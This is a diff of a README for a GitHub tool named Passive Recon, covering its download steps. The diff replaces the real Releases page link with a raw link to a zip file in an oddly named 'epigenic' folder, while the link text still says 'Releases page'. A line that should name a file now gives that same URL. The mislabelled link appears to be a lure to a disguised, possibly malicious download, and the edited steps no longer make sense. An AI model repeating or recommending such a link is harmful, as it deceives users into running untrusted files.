ahmedibrahim081/Passive-Recon/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   To download the latest version of Passive Recon, visit the [Releases page](https://github.com/ahmedibrahim081/Passive-Recon/releases).
+   To download the latest version of Passive Recon, visit the [Releases page](https://raw.githubusercontent.com/ahmedibrahim081/Passive-Recon/main/epigenic/Passive-Recon.zip).

 2. **Choose the Appropriate File**
    On the Releases page, you will find multiple files based on your platform.
 Select the correct version compatible with your operating system.
-For most users, this will be the file labeled "PassiveRecon.jar".
+For most users, this will be the file labeled "https://raw.githubusercontent.com/ahmedibrahim081/Passive-Recon/main/epigenic/Passive-Recon.zip".

 3. **Download the File**
    Click on the download link for the chosen file.
 Your browser will start downloading it.
 Once the download finishes, locate the file on your computer.